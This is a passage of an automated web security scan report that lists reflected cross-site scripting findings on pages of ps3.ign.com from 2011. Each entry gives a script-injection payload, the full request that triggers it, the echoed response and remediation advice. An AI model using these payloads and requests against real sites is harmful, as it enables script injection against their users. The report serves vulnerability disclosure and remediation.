HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Expires: Mon, 07 Feb 2011 01:24:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 07 Feb 2011 01:24:02 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Set-Cookie: freq=c-1297041089878v-2n-12mc+1297041089878mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 170238
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Sony PlayStation 3 ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ps3.ign.com/?fb8f4"><script>alert(1)</script>f95cd206ad4=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.360. http://ps3.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aaa6"-alert(1)-"f6cf9c25e10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Expires: Mon, 07 Feb 2011 01:24:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 07 Feb 2011 01:24:04 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Set-Cookie: freq=c-1297041089878v-2n-12mc+1297041089878mv+2mn+12wwe~0;Path=/;Domain=.ign.com Content-Length: 170197
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Sony PlayStation 3 ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/?3aaa6"-alert(1)-"f6cf9c25e10=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.361. http://ps3.ign.com/articles/114/1144303p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1144303p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32a9e"-alert(1)-"56adb2b626c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1144303p1.html?32a9e"-alert(1)-"56adb2b626c=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... mscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/articles/114/1144303p1.html?32a9e"-alert(1)-"56adb2b626c=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.362. http://ps3.ign.com/articles/114/1144303p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1144303p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adfce"><script>alert(1)</script>e0f357e8c85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1144303p1.html?adfce"><script>alert(1)</script>e0f357e8c85=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.363. http://ps3.ign.com/articles/114/1145224p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1145224p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e205"-alert(1)-"623b1ca8aa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1145224p1.html?1e205"-alert(1)-"623b1ca8aa9=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... mscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/articles/114/1145224p1.html?1e205"-alert(1)-"623b1ca8aa9=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.364. http://ps3.ign.com/articles/114/1145224p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1145224p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e25a4"><script>alert(1)</script>6d77f227b32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1145224p1.html?e25a4"><script>alert(1)</script>6d77f227b32=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.365. http://ps3.ign.com/articles/114/1146078p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1146078p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47065"-alert(1)-"55532c305d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1146078p1.html?47065"-alert(1)-"55532c305d6=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... mscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/articles/114/1146078p1.html?47065"-alert(1)-"55532c305d6=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.366. http://ps3.ign.com/articles/114/1146078p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1146078p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e055"><script>alert(1)</script>0959ed8b0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1146078p1.html?5e055"><script>alert(1)</script>0959ed8b0d=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.367. http://ps3.ign.com/articles/114/1147560p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1147560p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80237"><script>alert(1)</script>e1e153548d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147560p1.html?80237"><script>alert(1)</script>e1e153548d6=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.368. http://ps3.ign.com/articles/114/1147560p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1147560p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53b27"-alert(1)-"b64e36bc517 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147560p1.html?53b27"-alert(1)-"b64e36bc517=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... mscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/articles/114/1147560p1.html?53b27"-alert(1)-"b64e36bc517=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.369. http://ps3.ign.com/articles/114/1147862c.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1147862c.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f26f"-alert(1)-"ef87d61bb4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147862c.html?7f26f"-alert(1)-"ef87d61bb4b=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... omscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/articles/114/1147862c.html?7f26f"-alert(1)-"ef87d61bb4b=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.370. http://ps3.ign.com/articles/114/1147862c.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1147862c.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e9ba"><script>alert(1)</script>9a11bb4b630 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147862c.html?7e9ba"><script>alert(1)</script>9a11bb4b630=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.371. http://ps3.ign.com/articles/114/1147862p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1147862p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb884"><script>alert(1)</script>57959a7b1c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1147862p1.html?cb884"><script>alert(1)</script>57959a7b1c8=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.372. http://ps3.ign.com/articles/114/1147862p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/articles/114/1147862p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f39a5"-alert(1)-"1ede8df9cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147862p1.html?f39a5"-alert(1)-"1ede8df9cd4=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... mscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/articles/114/1147862p1.html?f39a5"-alert(1)-"1ede8df9cd4=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.373. http://ps3.ign.com/index/features.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/features.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 161f0"><script>alert(1)</script>90925892c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/features.html?161f0"><script>alert(1)</script>90925892c2=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.374. http://ps3.ign.com/index/features.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/features.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcd07"-alert(1)-"0501e30db16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/features.html?bcd07"-alert(1)-"0501e30db16=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Playstation 3 Revi ...[SNIP]... peof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/features.html?bcd07"-alert(1)-"0501e30db16=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.375. http://ps3.ign.com/index/games.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/games.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45ea3"><script>alert(1)</script>304e9e745b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/games.html?45ea3"><script>alert(1)</script>304e9e745b0=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>All PlayStation 3 ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ps3.ign.com/index/games.html?45ea3"><script>alert(1)</script>304e9e745b0=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.376. http://ps3.ign.com/index/games.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/games.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6724"-alert(1)-"678e643bb31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/games.html?a6724"-alert(1)-"678e643bb31=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>All PlayStation 3 ...[SNIP]... (typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/games.html?a6724"-alert(1)-"678e643bb31=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.377. http://ps3.ign.com/index/images.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/images.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f171f"><script>alert(1)</script>2786daf0d8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/images.html?f171f"><script>alert(1)</script>2786daf0d8c=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.378. http://ps3.ign.com/index/images.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/images.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bb1d"-alert(1)-"46813fa1d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/images.html?1bb1d"-alert(1)-"46813fa1d0a=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PS3: Games, Ch ...[SNIP]... typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/images.html?1bb1d"-alert(1)-"46813fa1d0a=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.379. http://ps3.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e05f3"><script>alert(1)</script>66263dfc6a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/latest-updates.html?e05f3"><script>alert(1)</script>66263dfc6a1=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ps3.ign.com/index/latest-updates.html?e05f3"><script>alert(1)</script>66263dfc6a1=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.380. http://ps3.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5299"-alert(1)-"fc6c6089c4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/latest-updates.html?f5299"-alert(1)-"fc6c6089c4e=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into an HTML comment. The payload bfcaa--><script>alert(1)</script>6c1abd932ba was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index/latest-updates.html?types=allbfcaa--><script>alert(1)</script>6c1abd932ba HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c816f"><script>alert(1)</script>798af2f97c8 was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/latest-updates.html?types=allc816f"><script>alert(1)</script>798af2f97c8 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc477"-alert(1)-"f3c5a983a90 was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/latest-updates.html?types=allbc477"-alert(1)-"f3c5a983a90 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... uard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/latest-updates.html?types=allbc477"-alert(1)-"f3c5a983a90", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.384. http://ps3.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfa5d"-alert(1)-"af0463b8eb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/news.html?bfa5d"-alert(1)-"af0463b8eb2=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PS3: Games, Ch ...[SNIP]... f(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps3.ign.com/index/news.html?bfa5d"-alert(1)-"af0463b8eb2=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.385. http://ps3.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef080"><script>alert(1)</script>e974aa6ea75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/news.html?ef080"><script>alert(1)</script>e974aa6ea75=1 HTTP/1.1 Host: ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.386. http://ps3.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/index/previews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa52e"-alert(1)-"4aeaced405c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
